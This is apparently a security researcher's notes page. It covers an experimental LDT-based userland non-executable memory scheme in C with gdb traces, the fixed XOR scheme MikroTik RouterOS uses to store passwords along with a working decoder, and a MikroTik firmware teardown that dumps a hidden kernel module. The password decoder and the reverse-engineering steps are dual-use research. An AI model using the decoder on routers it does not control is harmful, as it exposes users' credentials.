new = mmap(low+0x60000000, size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
if(new == MAP_FAILED) {
printf("Unable to map code duplicate: %s\n", strerror(errno));
exit(EXIT_FAILURE);
}
memcpy(new, low, size);
mprotect(new, size, PROT_READ|PROT_EXEC);
}
old_stack = low;
old_stack_len = size;
}
fclose(f);
//exit(EXIT_FAILURE);
}
#define STKSIZ (4096 * 32)
// more code from drifter level11.. so I'm lazy :P
unsigned char *allocate_stack()
{
int found;
int address;
short int shift;
unsigned char *stack_ptr;
int urand_fd;
urand_fd = open("/dev/urandom", O_RDONLY);
found = 0;
while(!found) {
if(read(urand_fd, &address, 4) != 4) {
printf("Read failure on /dev/urandom: %s\n", strerror(errno));
exit(EXIT_FAILURE);
}
if(read(urand_fd, &shift, 2) != 2) {
printf("Read failure on /dev/urandom: %s\n", strerror(errno));
exit(EXIT_FAILURE);
}
shift &= 4088; // (page_size - 1) with the low 3 bits cleared, to align the stack to 8 bytes
#if 1
address &= 0x5f7fffff; // remove everything except for last 8M of address space
//address |= TOOBIG;
#endif
address &= ~4095; // clear page addr
stack_ptr = mmap(address, STKSIZ, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
if(stack_ptr != MAP_FAILED) found = 1;
}
close(urand_fd);
stack_ptr = (unsigned int)(stack_ptr) + (STKSIZ) - shift;
memset(stack_ptr, 0xcc, shift);
stack_ptr--;
return stack_ptr;
}
void do_vulnerable()
{
munmap(old_stack, old_stack_len);
printf("Hello from do_vulnerable\n");
vulnerable();
do_exit();
}
int main(int argc, char **argv)
{
short int seg;
unsigned char *stack;
if(do_ldt(0, 0x60000000, MODIFY_LDT_CONTENTS_CODE) == 0) {
printf("Failed to modify ldt\n");
exit(EXIT_FAILURE);
}
seg = 7;
duplicate_code_mappings();
stack = allocate_stack();
printf("--> Will unmap old stack starting @ 0x%08x\n", old_stack);
system("cat /proc/$PPID/maps");
printf("Returning to do_vulnerable\n");
__asm__ volatile("movl %0, %%esp;\
movl %%esp, %%ebp;\
pushl %1;\
pushw %2;\
pushl %3;\
lret"
:
: "m"(stack), "m" (do_exit), "r" (seg), "r" ((unsigned int)(do_vulnerable))
);
}
The above was compiled with:
diet gcc -fno-pie -fno-stack-protector ldt_test.c -o ldt_test
The above code creates a new stack mapping (because the original is mapped somewhere around 0xbfff0000) and allocates it underneath the cutoff point. In addition, it duplicates the code layout by scanning /proc/self/maps for mappings marked executable and NOT writable.
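The selection logic is easier to see outside of the fscanf() format string. Here's a rough Python equivalent that only decides what would be duplicated and where; it doesn't map anything. The names are mine, and it skips anything starting at or above the split with a plain comparison, which is a simplification of the mask test in the C code.

```python
SPLIT = 0x60000000


def parse_maps_line(line):
    """Split one /proc/<pid>/maps line into (low, high, perms, path)."""
    fields = line.split(None, 5)
    low, high = (int(part, 16) for part in fields[0].split("-"))
    path = fields[5].strip() if len(fields) > 5 else ""
    return low, high, fields[1], path


def mappings_to_mirror(lines):
    """Return (start, size, mirror_address) for each mapping to duplicate."""
    todo = []
    for line in lines:
        if not line.strip():
            continue
        low, high, perms, _path = parse_maps_line(line)
        if low >= SPLIT:
            continue                      # already in the code half (or above)
        if perms[1] == "-" and perms[2] == "x":
            todo.append((low, high - low, low + SPLIT))
    return todo


if __name__ == "__main__":
    with open("/proc/self/maps") as maps:
        for start, size, mirror in mappings_to_mirror(maps):
            print("0x%08x +%d -> 0x%08x" % (start, size, mirror))
```

On a modern 64 bit system the addresses it prints won't make sense for this scheme, but the filtering is the same.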
The vulnerable() function simulates a stack overflow, pointing the return address at the int3 instructions. Optionally, it can be compiled with -DHEAP, and it will simulate a return address pointing into the heap, rather than the stack.
Watching it catch heap execute attempts:
GNU gdb 6.7.1
Copyright (C) 2007 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-pc-linux-gnu"...
(no debugging symbols found)
Using host libthread_db library "/lib/libthread_db.so.1".
(gdb) r
Starting program: /root/drifter/ldt/ldt_wot
--> Duplicating 0x08048000, 24576 bytes long
--> Will unmap old stack starting @ 0xbfffc000
00110000-00111000 rw-p 00000000 00:00 0
08048000-0804e000 r-xp 00000000 08:01 50639 /root/drifter/ldt/ldt_wot
0804e000-08050000 rw-p 00005000 08:01 50639 /root/drifter/ldt/ldt_wot
08050000-08051000 rwxp 00000000 00:00 0
0d2a4000-0d2c4000 rw-p 00000000 00:00 0
68048000-6804e000 r-xp 00000000 00:00 0
bfffc000-c0000000 rwxp ffffd000 00:00 0
Returning to do_vulnerable
Hello from do_vulnerable
Program received signal SIGSEGV, Segmentation fault.
0x00111008 in ?? ()
(gdb) x/4i $eip
0x111008: int3
0x111009: int3
0x11100a: int3
0x11100b: int3
And stack execution attempts:
GNU gdb 6.7.1
Copyright (C) 2007 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-pc-linux-gnu"...
(no debugging symbols found)
Using host libthread_db library "/lib/libthread_db.so.1".
(gdb) r
Starting program: /root/drifter/ldt/ldt_wot
--> Duplicating 0x08048000, 24576 bytes long
--> Will unmap old stack starting @ 0xbfff4000
00110000-00111000 rw-p 00000000 00:00 0
063c3000-063e3000 rw-p 00000000 00:00 0
08048000-0804e000 r-xp 00000000 08:01 50635 /root/drifter/ldt/ldt_wot
0804e000-08050000 rw-p 00005000 08:01 50635 /root/drifter/ldt/ldt_wot
08050000-08051000 rwxp 00000000 00:00 0
68048000-6804e000 r-xp 00000000 00:00 0
bfff4000-c0000000 rwxp ffff5000 00:00 0
Returning to do_vulnerable
Hello from do_vulnerable
Program received signal SIGSEGV, Segmentation fault.
0x063e25b1 in ?? ()
(gdb) x/4i $eip
0x63e25b1: int3
0x63e25b2: int3
0x63e25b3: int3
0x63e25b4: int3
This idea would be easily implemented in the ELF loader (ld.so, not kernel) if it laid out the memory correctly, and probably remapped the stack to a lower address. It would also have to hook stuff like mmap() and duplicate it if possible/applicable.
Anonymous memory could possibly be handled via making it disk backed, and mapping twice from that.
As opposed to memcpy, it should correctly parse /proc/<pid>/maps, and mmap() from shared libraries correctly.
Dynamically generated code could be handled by marking segments non writable, when attempting to execute them. On attempts to write there again, it would be unmapped from the executable region, and marked writable again. Self modifying code would be handled via this mechanism, albeit slowly.
Duplicating code sections can't be done completely faithfully, as we can't duplicate anonymous mappings, etc., if they were to become executable. A workaround exists by making them disk backed, however.
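To make the /proc/<pid>/maps idea a little more concrete, here is a minimal sketch of the parsing side only. The names Mapping, parse_maps_line and executable_file_mappings are made up for illustration, and the sketch assumes the usual "start-end perms offset dev inode path" line layout seen in the gdb output above. It does not do any of the remapping.

```python
from collections import namedtuple

# Hypothetical record type for one line of /proc/<pid>/maps.
Mapping = namedtuple("Mapping", "start end perms offset dev inode path")


def parse_maps_line(line):
    """Parse one maps line; the path field is optional (anonymous memory)."""
    fields = line.split(None, 5)
    addr, perms, offset, dev, inode = fields[:5]
    path = fields[5].strip() if len(fields) > 5 else ""
    start, end = (int(x, 16) for x in addr.split("-"))
    return Mapping(start, end, perms, int(offset, 16), dev, int(inode), path)


def executable_file_mappings(lines):
    """Yield executable, file-backed mappings (candidates for a second mmap())."""
    for line in lines:
        if not line.strip():
            continue
        m = parse_maps_line(line)
        if "x" in m.perms and m.path.startswith("/"):
            yield m


sample = [
    "08048000-0804e000 r-xp 00000000 08:01 50639 /root/drifter/ldt/ldt_wot",
    "0804e000-08050000 rw-p 00005000 08:01 50639 /root/drifter/ldt/ldt_wot",
    "08050000-08051000 rwxp 00000000 00:00 0",
]
for m in executable_file_mappings(sample):
    print("%08x-%08x %s %s" % (m.start, m.end, m.perms, m.path))
```

Anonymous executable mappings (like the rwxp one in the sample) are deliberately skipped here, since those are the ones that would need the disk-backed trick.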
You could bypass it by returning to a retf instruction, which would use the CS descriptor from the GDT, which is probably marked 0-4G executable :p
Probably a bunch of other weaknesses.
Doing it from userland is pretty lame :P
Userland Process Scheduling (Another article for another day, maybe an outline soon.)
Since debuggers on 32 bit platforms probably assume a flat memory layout, it could be feasible to use different CS/DS/SS/whatever selectors as a minor obfuscation mechanism.
(added 3/1/2008)
On the 3rd January, manio [at] skyboo [dot] net e-mailed me asking for some hints / tips / advice about how the passwords are stored in the MikroTik Router OS image. (To his credit, he said he realised it was XOR based pretty much after he hit sent the mail). The user/password information is stored in /nova/store/user.dat. His homepage is http://manio.skyboo.net/mikrotik/.
According to him, the following passwords had the following encrypted text:
password        encrypted text
zero length pw  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0               78 BF DE 06 49 5A 0E 2D 09 D5 FB 27 B1 44 EC 93 01
aaa             29 DE BF 06 49 5A 0E 2D 09 D5 FB 27 B1 44 EC 93 01
ala             29 D3 BF 06 49 5A 0E 2D 09 D5 FB 27 B1 44 EC 93 01
0000            48 8F EE 36 49 5A 0E 2D 09 D5 FB 27 B1 44 EC 93 01
Initially, we can note that :
The bytes after the password length are unchanged.
Characters after changed characters are still hashed the same.
This made me think it was something trivial such as an XOR based scheme.
If it is, we can work out what the first XOR byte is by:
>>> hex(0x78 ^ ord('0'))
'0x48'
This works due to the properties of XOR.
Continuing on with our analysis / assumption that it is XOR, we move to the second char: we take the suspected XOR byte of 0xbf, and XOR it against the ASCII values of a and l:
>>> hex(0xbf ^ ord('a'))
'0xde'
>>> hex(0xbf ^ ord('l'))
'0xd3'
As we can see, the returned bytes are the same as the second bytes from the "hash" from aaa and ala respectively.
Since we now know the "encryption" key, we can write a decoder trivially. (As a side note, I like Python's doctest module :) )
$ python mikrotik_password.py 29 de bf 06 49 5a 0e 2d 09 d5 fb 27 b1 44 ec 93 01 aaa
The password decoder can be found here for those who care.
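For those who don't want to fetch the script, a minimal sketch of such a decoder follows. This is not the original mikrotik_password.py; the function names are mine. It assumes the scheme really is a fixed XOR key stream, that the password is zero padded (so the unchanged trailing bytes are the raw key), and it recovers the key from the one known pair shown above (aaa). The all-zero record for an empty password is not handled.

```python
# Known plaintext / ciphertext pair taken from the example above.
KNOWN_PLAIN = b"aaa"
KNOWN_CIPHER = bytes.fromhex("29 de bf 06 49 5a 0e 2d 09 d5 fb 27 b1 44 ec 93 01")


def recover_key(plain, cipher):
    """XOR the zero-padded known plaintext with its ciphertext to get the key."""
    padded = plain.ljust(len(cipher), b"\x00")
    return bytes(p ^ c for p, c in zip(padded, cipher))


KEY = recover_key(KNOWN_PLAIN, KNOWN_CIPHER)


def decode_password(hex_bytes):
    """Decode a space separated hex dump of one stored password."""
    cipher = bytes.fromhex(hex_bytes)
    plain = bytes(c ^ k for c, k in zip(cipher, KEY))
    # Assumption: everything after the password decodes to NUL padding.
    return plain.rstrip(b"\x00").decode("ascii")


print(decode_password("78 BF DE 06 49 5A 0E 2D 09 D5 FB 27 B1 44 EC 93 01"))
```

Since XOR is its own inverse, the same key recovery works from any known password of sufficient length.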
I do not know if the encryption key changes on different releases of RouterOS, or if it is dependent upon the license key or anything like that - this was coded with the information manio (lowercased upon his request) provided to me. manio said that he would investigate this when he gets a chance.
(added 20/11/2007)
Despite what many have thought, ruxcon will be making a comeback in 2008 :) Not too much has been planned at the moment, but by the looks of it, things are back on track. Somewhat recently, a ddos kiddie from South Australia packeted the box, causing the hosting provider to null route the ip… however that issue was sorted out.
I will be attempting to do a talk at ruxcon, not sure exactly what, but probably regarding hardened linux, and covering such things as PaX / grsecurity and other assorted things.
Depending on how things are going, I will probably set up a capture the flag game as well.
If you are interested in speaking at Ruxcon 2008, drop a note to chris@ruxcon.org.au indicating your interest.
Hope to see you all there :D
(started 28/8/2007, added 11/10/2007)
The MikroTik Wireless Router is a Linux embedded wireless router, focusing on various functionality such as bandwidth management, Firewalling, VPN server/client, and various other things. As with all embedded linux based software, it is interesting to pull it apart :)
It has been around for a while now… a couple of years ago, when I was analysing the software and pulling it apart, it had drivers/firmware to turn standard Orinoco wireless cards into an Access Point (which, as far as I know, wasn't possible otherwise, at least not when I was looking at it).
For the purposes of this article, I am looking at mikrotik-2.9.46.iso (MD5sum: 65aa908dd748ccf72ad9f588613dfe31, SHA1sum: 5e5ed13498db8d9745a701f75e58da3ef6701e58). For the most part, I have used QEMU to emulate the hardware/software environment to install it on. This has several advantages, such as being able to edit the "disk" it's using easily, amongst other things.
To perform more active analysis of the MikroTik components, we could copy the applicable binaries and associated libraries to another linux platform. This would allow us to strace the binary, debug it (which is incredibly useful for exploit development), and monitor the activities it performs in general. Furthermore, we can copy the kernel and applicable modules to perform further analysis on them, and to allow the environment to be replicated a lot better.
For this article, I have done a basic network install of Debian 4rc1. After performing the installation and installing a bunch of generic tools (strace/gdb/gcc/ltrace/openssh-server/nasm/etc), I then extracted the Mikrotik kernel and modules, and put the applicable files into their place.
[box] # wget http://felinemenace.org/~andrewg/MikroTik_Router_Security_Analysis_Part1/MikroTik-2.9.46-kernel-initrd.tgz
--08:58:00-- http://felinemenace.org/~andrewg/MikroTik_Router_Security_Analysis_Part1/MikroTik-2.9.46-kernel-initrd.tgz
=> `MikroTik-2.9.46-kernel-initrd.tgz'
Resolving felinemenace.org... 69.55.233.10
Connecting to felinemenace.org|69.55.233.10|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1,832,960 (1.7M) [application/x-gzip]
100%[====================================>] 1,832,960 327.68K/s ETA 00:00
08:58:06 (330.42 KB/s) - `MikroTik-2.9.46-kernel-initrd.tgz' saved [1832960/1832960]
[box] # tar xzf MikroTik-2.9.46-kernel-initrd.tgz
[box] # mv lib/modules/2.4.31/ /lib/modules/2.4.31
[box] # mv boot/vmlinuz /boot/vmlinuz-2.4.31
[box] # cd /boot/grub/
[box] # cat >>menu.lst <<_EOF_
> title MikroTik 2.4.31 / 2.9.46
> root (hd0,0)
> kernel /boot/vmlinuz-2.4.31
>
> _EOF_
[box] # sync ; reboot
While the QEMU image was rebooting, I wondered if it would work, due to differences in 2.6 and 2.4 kernels.. Firstly though, it appeared I may have to experiment with initrd images to load the applicable drivers for it and generally mess around as when booting it displayed:
Booting 'MikroTik 2.4.31 / 2.9.46'
root (hd0,0)
Filesystem type is ext2fs, partition type is 0x83
kernel /boot/vmlinuz-2.4.31
[Linux-bzImage, setup=0x1400, size=0xa044d]
Uncompressing Linux... Ok, booting the kernel.
Kernel panic: VFS: Unable to mount root fs on 09:00
Booting back into the standard Debian kernel:
[box] # cd /boot/
[box] # cp /root/boot/initrd.rgz mikro-initrd.rgz
[box] # cd grub/
[box] # echo initrd /boot/mikro-initrd.rgz >>menu.lst
[box] # sync ; reboot
Unfortunately, this gives a similar error message to before. We know from previously mounting the MikroTik root filesystem that it was ext3, but we can attempt to verify which filesystems the kernel supports. Looking over the original find output for the kernel modules, we don't see any filesystem modules for the default ext2 filesystem.
We can verify the filesystems supported by analysing the vmlinuz file. To summarise, this file contains some boot code to get the machine into a decent state, a gzip decompression routine, and a heap of compressed data. The information we're interested in is in the compressed data, so we have to decompress it. As it's not a standard gzip file, we can't just run gunzip on it and be done with it; we need to extract the compressed data first.
Fortunately, this can be done rather easily because of the gzip header / magic bytes, which allow us to find suitable offsets to attempt decompression from. The gzip magic bytes can be found by doing:
[box] # cd /tmp
[box] # cp /etc/passwd .
[box] # gzip passwd
[box] # xxd passwd.gz | head
0000000: 1f8b 0808 2061 d346 0003 7061 7373 7764  .... a.F..passwd
0000010: 0065 93c1 6ec2 300c 86ef 3c05 c74d 0285  .e..n.0...<..M..
0000020: 5260 90e3 3469 9771 d99e c06d 4289 d626  R`..4i.q...mB..&
0000030: 55d2 5278 fbd9 71a0 4593 adc8 7ffc 2536  U.Rx..q.E.....%6
0000040: 0ef5 ce75 f22a 5768 9e42 c16b 61ac 2820  ...u.*Wh.B.ka.(
0000050: 9c67 0a74 e32c 1219 5a12 a20f 5e04 4498  .g.t.,..Z...^.D.
0000060: 438a e2ab 5ca3 dd77 1fa9 700b 98ca d128  C...\..w..p....(
0000070: 124a 5f26 295b 626e 2377 db6d be91 514e  .J_&)[bn#w.m..QN
0000080: cea2 9c55 d068 3abf 95bb 9564 11ab a730  ...U.h:....d...0
0000090: 5dd4 0095 dfc9 6c2d 2914 17f0 a284 f2ac  ].....l-).......
For the purpose at hand, we'll use 0x1f8b as our marker.
[box] # xxd /boot/vmlinuz-2.4.31 | egrep "\b1f8b|1f\b \b8b" | head -n 5
00049a0: a9d0 0900 1f8b 0800 b533 bc46 0203 ec5d  .........3.F...]
0004f20: 3613 e31f 8b6d a730 ef6f 1078 d415 4401  6....m.0.o.x..D.
001c6c0: 0a1f 8bab 69a2 a7e5 533b 4d60 764f 93bc  ....i...S;M`vO..
00381b0: c3ba d727 7964 631f 8baf 810c 2704 206f  ...'ydc.....'. o
003fdf0: 972f d2d6 d50e 5d37 180b 771f 8bc5 b43d  ./....]7..w....=
To extract the compressed data from the vmlinuz-2.4.31 file, dd does the trick easily. We'll start from our first match (the 1f8b at offset 0x49a4) and work our way down.
[box] # dd if=/boot/vmlinuz-2.4.31 of=vmlinuz.gz bs=1 skip=$((0x49a4))
662093+0 records in
662093+0 records out
662093 bytes (662 kB) copied, 16.0954 seconds, 41.1 kB/s
[box] # file vmlinuz.gz
vmlinuz.gz: gzip compressed data, from Unix, last modified: Fri Aug 10 19:45:25 2007, max compression
[box] # gunzip vmlinuz.gz
[box] # strings -a vmlinuz
... skip ...
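The xxd / dd / gunzip steps above can also be rolled into a few lines of Python. This is only a sketch of the same idea, not what I actually ran: the function name extract_embedded_gzip is made up, and it assumes the embedded stream uses the deflate method (so the third byte is 08, as in both dumps above). It tries each candidate offset until one decompresses cleanly, and ignores whatever trails the stream.

```python
import gzip
import zlib

# gzip magic (1f 8b) followed by the deflate compression method byte (08).
GZIP_MAGIC = b"\x1f\x8b\x08"


def extract_embedded_gzip(blob):
    """Return (offset, data) for the first gzip stream that decompresses, else None."""
    pos = blob.find(GZIP_MAGIC)
    while pos != -1:
        try:
            d = zlib.decompressobj(wbits=31)  # 31 = expect a gzip header
            data = d.decompress(blob[pos:])
            if d.eof:  # reached the end of a complete stream
                return pos, data
        except zlib.error:
            pass  # false positive, keep scanning
        pos = blob.find(GZIP_MAGIC, pos + 1)
    return None


# Stand-in for a kernel image: junk, a gzip stream, then trailing junk.
fake_image = b"\x7fELF" + b"\x00" * 50 + gzip.compress(b"Linux version 2.4.31") + b"\xff" * 16
print(extract_embedded_gzip(fake_image))
```

Against the real file you would read /boot/vmlinuz-2.4.31 in binary mode and pass the bytes in; the offset that comes back should match the one found by hand.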
After seeing various ext2 related things, I realised it was probably a problem with something else. Reviewing grub's menu.lst, it becomes obvious:
title Debian GNU/Linux, kernel 2.6.18-5-686
root (hd0,0)
kernel /boot/vmlinuz-2.6.18-5-686 root=/dev/hda1 ro
initrd /boot/initrd.img-2.6.18-5-686
savedefault
.... skip...
title MikroTik 2.4.31 / 2.9.46
root (hd0,0)
kernel /boot/vmlinuz-2.4.31
initrd /boot/mikro-initrd.rgz
The kernel line for the MikroTik entry is missing some parameters. After fixing the applicable line (kernel /boot/vmlinuz-2.4.31 root=/dev/hda1 ro single) and rebooting, it works. At least decompressing the kernel image may come in useful for further investigation work. One last thing to note is that the Debian modutils package is required to work with 2.4 kernels.
Anyways, moving on, the debian image boots up and works reasonably with their kernel / modules. I had to load the ne2k-pci module manually (via modprobe ne2k-pci) to bring up networking under QEMU.
Another issue I had under the debian/mikrotik hybrid I created, was that the MikroTik kernel does not have AF_UNIX/AF_FILE support built-in, so useful programs like sysklogd and sshd would not run by default… However, it ships this as a module, so modprobe unix took care of this issue.
In order to run the MikroTik binaries (/nova/bin/), I needed to copy various files. I copied /nova/ over, and made a directory called /lib_mikro/ where I could copy the various library files that resided in the /lib directory on the MikroTik installation.
In order to use these libraries in a non-standard directory location, the environment variable LD_LIBRARY_PATH can be set. This way only the applicable MikroTik binaries are run with the MikroTik library versions.
Doing some preliminary analysis on the fileman binary shows that it appears to be expecting a network file descriptor on fd 3.
[box] $ LD_LIBRARY_PATH=/lib_mikro/ strace -f ./fileman
execve("./fileman", ["./fileman"], [/* 14 vars */]) = 0
uname({sys="Linux", node="debian", ...}) = 0
brk(0) = 0x805861c
...
rt_sigaction(SIGFPE, {0x4002c8ca, [], SA_RESTORER|SA_RESTART|SA_SIGINFO,
0x4009d4c0}, NULL, 8) = 0
getsockname(3, 0xbffffd18, [110]) = -1 EBADF (Bad file descriptor)
socket(PF_FILE, SOCK_STREAM, 0) = -1 EAFNOSUPPORT (Address family not
supported by protocol)
exit_group(1) = ?
Process 2147 detached
Unfortunately, Debian's version of bash does not have /dev/tcp/ support, so it's not as easy as nc -l 12121 on one terminal, and … ./fileman 3</dev/tcp/blah/.
After quickly writing some code to do what's needed, we can run fileman (and probably others). It's available here if you would like it. Usage is simple, python fd3.py <program to execute> <arguments for program>. Note that the first argument you specify for the program is argv[0] - not argv[1]. An example of a command line would be python fd3.py /usr/bin/strace strace -f /path/to/program.
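For the curious, the general shape of such a helper is sketched below. This is not the fd3.py linked above, just an illustration of the idea under my own naming (spawn_with_fd3 and listen_and_spawn are hypothetical): accept one TCP connection, move it onto descriptor 3 in a child process, and exec the target with the argument vector given (so argv[0] comes first, as noted above).

```python
import os
import socket


def spawn_with_fd3(sock, program, argv):
    """Fork, place sock on descriptor 3 in the child, then exec program.

    argv is the full argument vector, so argv[0] is the program name.
    Returns the child's pid in the parent.
    """
    pid = os.fork()
    if pid == 0:
        try:
            if sock.fileno() != 3:
                os.dup2(sock.fileno(), 3)
            # Python sockets are close-on-exec by default, so clear that on fd 3.
            os.set_inheritable(3, True)
            os.execv(program, argv)
        finally:
            os._exit(127)  # only reached if the exec failed
    return pid


def listen_and_spawn(port, program, argv):
    """Accept one TCP connection on port and hand it to program as fd 3."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind(("", port))
        srv.listen(1)
        conn, _addr = srv.accept()
    pid = spawn_with_fd3(conn, program, argv)
    conn.close()
    return os.waitpid(pid, 0)
```

Something like listen_and_spawn(31313, "/usr/bin/strace", ["strace", "-f", "./fileman"]) would then mirror the command line shown above, with LD_LIBRARY_PATH set in the environment beforehand.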
Another issue appeared when trying to run fileman with a valid file descriptor on fd 3 - it wanted /tmp/novasock to exist as a UNIX socket it could connect to:
[box] $ LD_LIBRARY_PATH=/lib_mikro fd3 `which strace` strace -f ./fileman
getsockname(3, {sa_family=AF_INET, sin_port=htons(31313), sin_addr=inet_addr("192.168.254.3")}, [16]) = 0
socket(PF_FILE, SOCK_STREAM, 0) = 4
connect(4, {sa_family=AF_FILE, path="/tmp/novasock"}, 110) = -1 ENOENT (No such file or directory)
close(4) = 0
exit_group(1) = ?
Looking for /tmp/novasock, we find that the loader binary seems to have what we're after:
[box] $ strings -f * | grep novasock
loader: /tmp/novasock
Performing some initial analysis via strace on loader reveals an interesting / startling behaviour in loader:
[box] $ LD_LIBRARY_PATH=/lib_mikro strace -f ./loader
...
[pid 2361] create_module("qwink", 1430) = 0xc8831000
[pid 2361] init_module(0x80553fc, 134587376, umovestr: Input/output error
0xa7) = 0
[pid 2361] delete_module("qwink") = 0
...
The interesting thing about this particular piece of code is that it is loading a linux kernel module (LKM), and immediately removes the kernel module. This is particularly interesting as it would appear to be a kernel module that's meant to be out of sight.
To dump the module, we could hook init_module to perform our required actions, however, first we have to verify it's easily possible:
[box] $ objdump -R loader | grep -i module
[box] $
This is interesting, as it appears to not be importing the various module library calls, performing some more analysis:
[box] $ objdump -dtrs loader | grep module
...
 804fb69: e8 3a 42 00 00          call 8053da8 <delete_module+0x336>
08053a20 <create_module>:
 8053a36: 76 0c                   jbe 8053a44 <create_module+0x24>
08053a49 <init_module>:
...
The interesting thing about this output is the sections where the module names are surrounded by the angle brackets; this indicates that those functions exist in the .text of loader:
08053a49 <init_module>:
 8053a49: 55                      push %ebp
 8053a4a: b8 80 00 00 00          mov $0x80,%eax
 8053a4f: 89 e5                   mov %esp,%ebp
 8053a51: 53                      push %ebx
 8053a52: 8b 4d 0c                mov 0xc(%ebp),%ecx
 8053a55: 8b 5d 08                mov 0x8(%ebp),%ebx
 8053a58: cd 80                   int $0x80
 8053a5a: 83 f8 82                cmp $0xffffff82,%eax
 8053a5d: 89 c3                   mov %eax,%ebx
 8053a5f: 76 0c                   jbe 8053a6d <init_module+0x24>
 8053a61: f7 db                   neg %ebx
 8053a63: e8 54 70 ff ff          call 804aabc <__errno_location@plt>
 8053a68: 89 18                   mov %ebx,(%eax)
 8053a6a: 83 cb ff                or $0xffffffff,%ebx
 8053a6d: 89 d8                   mov %ebx,%eax
 8053a6f: 5b                      pop %ebx
 8053a70: 5d                      pop %ebp
 8053a71: c3                      ret
This appears to be a standard implementation of the _syscallX() macros in the asm/unistd.h. While we're staring at objdump -d output, we may as well look at where this code is (statically) being called from:
 8053ea6: ff 75 dc                pushl 0xffffffdc(%ebp)
 8053ea9: ff 35 20 64 05 08       pushl 0x8056420
 8053eaf: e8 95 fb ff ff          call 8053a49 <init_module>
At 0x8053ea9 it pushes a static address (0x8056420) which does not correspond to our strace output. Having a brief look at where that variable is used before hand:
[box] $ objdump -dtrsRS loader | grep -C 2 8056420 ... 8053db4: 83 ec 18 sub $0x18,%esp 8053db7: c7 45 f0 00 00 00 00 movl $0x0,0xfffffff0(%ebp) 8053dbe: 8b 3d 20 64 05 08 mov 0x8056420,%edi 8053dc4: ba 10 00 00 00 mov $0x10,%edx 8053dc9: f2 ae repnz scas %es:(%edi),%al -- 8053e19: e8 3e 70 ff ff call 804ae5c <memcpy@plt> 8053e1e: 53 push %ebx 8053e1f: ff 35 20 64 05 08 pushl 0x8056420 8053e25: 56 push %esi 8053e26: e8 31 70 ff ff call 804ae5c <memcpy@plt> 8053e2b: ff 75 ec pushl 0xffffffec(%ebp) 8053e2e: ff 35 20 64 05 08 pushl 0x8056420 8053e34: e8 e7 fb ff ff call 8053a20 <create_module> 8053e39: 83 c4 24 add $0x24,%esp -- 8053ea1: e8 57 fd ff ff call 8053bfd <delete_module+0x18b> 8053ea6: ff 75 dc pushl 0xffffffdc(%ebp) 8053ea9: ff 35 20 64 05 08 pushl 0x8056420 8053eaf: e8 95 fb ff ff call 8053a49 <init_module> 8053eb4: 83 c4 10 add $0x10,%esp -- 8053ee0: 83 c4 0c add $0xc,%esp 8053ee3: 8b 55 f0 mov 0xfffffff0(%ebp),%edx 8053ee6: ff 35 20 64 05 08 pushl 0x8056420 8053eec: 39 c2 cmp %eax,%edx 8053eee: 0f 94 c3 sete %bl
So, it appears the variable is referenced several times while the module is being set up. Being the somewhat lazy type, I figured it would be easy enough to write a dynamic library that modifies the .text segment to insert a hook. The mechanisms used for this are discussed in a paper I wrote, available here.
The hook code aim is simple, which is to dump the applicable information sent to init_module. It also appears that the init_module function declaration changes between 2.4 and 2.6 kernel versions:
2.4: int init_module(const char *name, struct module *image);
2.6: long sys_init_module (void *umod, unsigned long len, const char *uargs);
The strace output above follows the 2.6 declaration, not the 2.4 one. After locating a suitable 2.4 init_module man page, we see that the second parameter is a pointer to a structure:
The module image begins with a module structure and is followed by code and data as appropriate. The module structure is defined as follows:
struct module {
unsigned long size_of_struct;
struct module *next;
const char *name;
unsigned long size;
long usecount;
unsigned long flags;
unsigned int nsyms;
unsigned int ndeps;
struct module_symbol *syms;
struct module_ref *deps;
struct module_ref *refs;
int (*init)(void);
void (*cleanup)(void);
const struct exception_table_entry *ex_table_start;
const struct exception_table_entry *ex_table_end;
#ifdef __alpha__
unsigned long gp;
#endif
};
At least the required information is available to make it easier. After writing the required code (which is available here) and running our hooking library, we get:
[box] $ LD_LIBRARY_PATH=/lib_mikro LD_PRELOAD=/tmp/hook-loader.so ./loader
forked
creating loader
--> In an int3 handler
--> Create module return address is 0xc8831000
--> In an int3 handler
--> working our magic for qwink
Matching the dumped header information with the struct module output, we get:
[box] $ xxd /tmp/module_header
0000000: 3c00 0000 0000 0000 9015 83c8 9605 0000  <...............
0000010: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000020: 0000 0000 0000 0000 0000 0000 4010 83c8  ............@...
0000030: 0000 0000 0000 0000 0000 0000            ............

... matching up with the above struct module ...

size_of_struct:  0x0000003c  (0x0000)
next:            NULL        (0x0004)
name:            0xc8831590  (0x0008)
size:            0x00000596  (0x000c)
usecount:        NULL        (0x0010)
flags:           0           (0x0014)
nsyms:           0           (0x0018)
ndeps:           0           (0x001c)
syms:            NULL        (0x0020)
deps:            NULL        (0x0024)
refs:            NULL        (0x0028)
init:            0xc8831040  (0x002c)
cleanup:         NULL        (0x0030)
ex_table_start:  NULL        (0x0034)
ex_table_end:    NULL        (0x0038)
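The matching up above was done by hand, but it is easy enough to script. The sketch below assumes a 32-bit little-endian layout with every field 4 bytes wide (which is what the 0x3c header size suggests on i386), and treats all fields as unsigned for display purposes. The names FIELDS and parse_module_header are mine.

```python
import struct

# Field order taken from the 2.4 struct module quoted above (non-alpha).
FIELDS = (
    "size_of_struct", "next", "name", "size", "usecount", "flags",
    "nsyms", "ndeps", "syms", "deps", "refs", "init", "cleanup",
    "ex_table_start", "ex_table_end",
)


def parse_module_header(raw):
    """Unpack the first 15 little-endian dwords into a field -> value dict."""
    values = struct.unpack("<%dI" % len(FIELDS), raw[:4 * len(FIELDS)])
    return dict(zip(FIELDS, values))


# The 60 bytes from the xxd dump of /tmp/module_header.
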